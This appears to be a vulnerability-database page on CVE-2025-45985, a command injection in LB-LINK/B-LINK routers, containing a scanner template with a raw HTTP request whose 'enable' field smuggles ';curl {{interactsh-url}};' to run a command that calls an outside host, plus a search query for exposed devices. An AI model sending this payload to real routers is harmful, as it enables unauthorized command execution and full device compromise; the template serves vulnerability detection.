| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| The vulnerability of the bs_SetSSIDHide() function in the libshare-0.0.26.so library of the LB-LINK router software allows a attacker to execute arbitrary commands. | 18 Jun 202500:00 | – | bdu_fstec | |
| CVE-2025-45985 | 13 Jun 202511:33 | – | circl | |
| LB-LINK多款产品 安全漏洞 | 13 Jun 202500:00 | – | cnnvd | |
| CVE-2025-45985 | 13 Jun 202500:00 | – | cve | |
| CVE-2025-45985 | 13 Jun 202500:00 | – | cvelist | |
| CVE-2025-45985 | 13 Jun 202512:15 | – | nvd | |
| CVE-2025-45985 | 13 Jun 202512:15 | – | osv | |
| PT-2025-25405 · Blink · Bl-Wr9000 +7 | 12 Apr 202500:00 | – | ptsecurity | |
| CVE-2025-45985 | 15 Jun 202500:21 | – | redhatcve | |
| VulnCheck KEV: CVE-2025-45985 | 23 Sep 202500:00 | – | vulncheck_kev |
id: CVE-2025-45985
info:
name: Blink Router - Command Injection
author: darses
severity: critical
description: |
Blink routers BL-WR9000 V2.4.9 , BL-AC2100_AZ3 V1.0.4, BL-X10_AC8 v1.0.5 , BL-LTE300 v1.2.3, BL-F1200_AT1 v1.0.0, BL-X26_AC8 v1.2.8, BLAC450M_AE4 v4.0.0 and BL-X26_DA3 v1.2.7 were discovered to contain a command injection vulnerability via the bs_SetSSIDHide function.
impact: |
Unauthenticated attackers can execute arbitrary operating system commands through the enable parameter in the set_hidessid_cfg endpoint, achieving complete device compromise.
remediation: |
Upgrade Blink router firmware to the latest version that properly sanitizes command parameters.
reference:
- https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_enable%20Unauthorized%20command%20injection/LB-LINK_enable%20command%20injection.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-45985
cwe-id: CWE-77
epss-score: 0.07116
epss-percentile: 0.93454
metadata:
verified: true
max-request: 1
fofa-query: title="B-LINK"
tags: cve,cve2025,b-link,rce,router,vkev,vuln
http:
- raw:
- |
POST /goform/set_hidessid_cfg HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{RootURL}}
Referer: {[RootURL]}/admin/more.html
Cookie: platform=0; user=admin
type=sethide2&enable=";curl {{interactsh-url}};"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"type":'
- '"result":'
condition: and
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 200
# digest: 480a00453043022036aa18768a6464158ae8a448200becd8f1956c4c906c73b700c1ad10a5281c8a021f0dd913d78882eefce91ed44407e3469baa241a410f51b3d3873a40a464ee4c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation